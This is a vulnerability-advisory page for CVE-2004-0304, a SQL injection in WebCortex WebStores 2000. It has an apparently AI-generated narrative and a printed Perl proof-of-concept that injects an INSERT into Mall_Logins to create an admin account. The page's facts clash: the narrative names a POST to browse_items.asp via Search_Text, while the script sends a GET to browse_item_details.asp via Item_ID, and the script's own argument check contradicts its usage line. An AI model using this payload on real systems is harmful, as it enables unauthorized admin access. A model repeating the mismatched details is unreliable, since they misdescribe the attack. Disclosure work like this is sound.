VYPR
← All advisories
Unrated severityNVD Advisory· Published Nov 23, 2004· Updated Apr 16, 2026

CVE-2004-0304

CVE-2004-0304

Description

SQL injection in WebCortex WebStores 2000 6.0 browse_items.asp allows remote attackers to gain admin access and execute arbitrary commands via the Search_Text parameter.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

SQL injection in WebCortex WebStores 2000 6.0 browse_items.asp allows remote attackers to gain admin access and execute arbitrary commands via the Search_Text parameter.

Vulnerability

SQL injection vulnerability exists in the browse_items.asp script of WebCortex WebStores 2000 version 6.0. The Search_Text parameter is not sanitized before being used in a SQL query, allowing an attacker to modify the query structure. The application runs on ASP and uses either MS Access or MS SQL Server as a backend; the SQL injection is particularly effective against MS SQL Server installations [1].

Exploitation

An unauthenticated remote attacker can exploit this by sending a crafted HTTP POST request to browse_items.asp with a malicious Search_Text value. The provided proof-of-concept demonstrates creating a new administrative account by injecting SQL commands. Additionally, if the backend is MS SQL Server, the attacker can leverage the xp_cmdshell stored procedure to execute arbitrary operating system commands [1].

Impact

Successful exploitation allows the attacker to gain administrative access to the shopping mall, read sensitive customer data from the database, and execute arbitrary commands on the database server, potentially leading to full system compromise [1].

Mitigation

No official patch or fix has been disclosed in the available references. Users of WebCortex WebStores 2000 version 6.0 should consider upgrading to a supported version or implementing input validation and parameterized queries as a workaround. The product may be end-of-life; consult the vendor for further guidance [1].

References
  1. 'WebCortex Webstores2000 version 6.0 multiple security vulnerabilities'

AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • Webcortex/Webstores 20002 versions
    cpe:2.3:a:webcortex:webstores_2000:6.0:*:*:*:*:*:*:*+ 1 more
    • cpe:2.3:a:webcortex:webstores_2000:6.0:*:*:*:*:*:*:*
    • (no CPE)range: =6.0

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The application fails to sufficiently sanitize user-supplied data in URI parameters, allowing for SQL injection."

Attack vector

Remote attackers can exploit this vulnerability by sending a crafted request to the `browse_items.asp` script. The vulnerability lies in the `Search_Text` parameter, which is not properly sanitized. By injecting SQL commands into this parameter, an attacker can modify the intended SQL query. This can lead to unauthorized access, information disclosure, or database corruption [ref_id=1]. The provided exploit demonstrates creating a Mall Admin user by injecting into the `Mall_Logins` table [ref_id=1].

Affected code

The vulnerability is present in the `browse_items.asp` script, specifically related to the handling of the `Search_Text` parameter. The exploit targets the `Mall_Logins` table by injecting data into the `insert into Mall_Logins values ('bosen','gembel')--` command [ref_id=1].

What the fix does

The advisory does not specify a patch or provide details on how the vulnerability is fixed. Remediation guidance typically involves implementing robust input validation and parameterized queries to prevent SQL injection attacks. Without a patch, the exact fix cannot be determined.

Preconditions

  • networkThe target application must be accessible over the network.
  • inputThe attacker must be able to send a crafted request with malicious SQL commands in the `Search_Text` parameter.

Reproduction

```perl #!/usr/bin/perl -w #This exploit create user with Mall Admin priv. #You can login via /MallAdmin/ $pamer = " 1ndonesian Security Team (1st) ============================== http://bosen.net/releases/

ws2k-ex.pl, WebStore2000 SQL Injection Proof of Concept Exploit by : Bosen Discover by : Bosen Greetz to : AresU, TioEuy, syzwz, TioEuy, sakitjiwa, muthafuka all #hackers\@centrin.net.id/austnet.org";

use LWP::UserAgent; use HTTP::Request; use HTTP::Response; $| = 1; print $pamer; if ($#ARGV<3){ print "\n Usage: perl ws2k-ex.pl <uri>\n\n"; exit; } my $legend = "$ARGV[0]/browse_item_details.asp?Item_ID="; $legend .= "''; insert into Mall_Logins values ('bosen','gembel')--";

my $bosen = LWP::UserAgent->new(); my $gembel = HTTP::Request->new(GET => $legend); my $dodol = $bosen->request($gembel); if ($dodol->is_error()) { printf " %s\n", $dodol->status_line; } else { print "Alhamdulillah :P\n"; } print "\n680165\n"; ```

Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

4

News mentions

0

No linked articles in our index yet.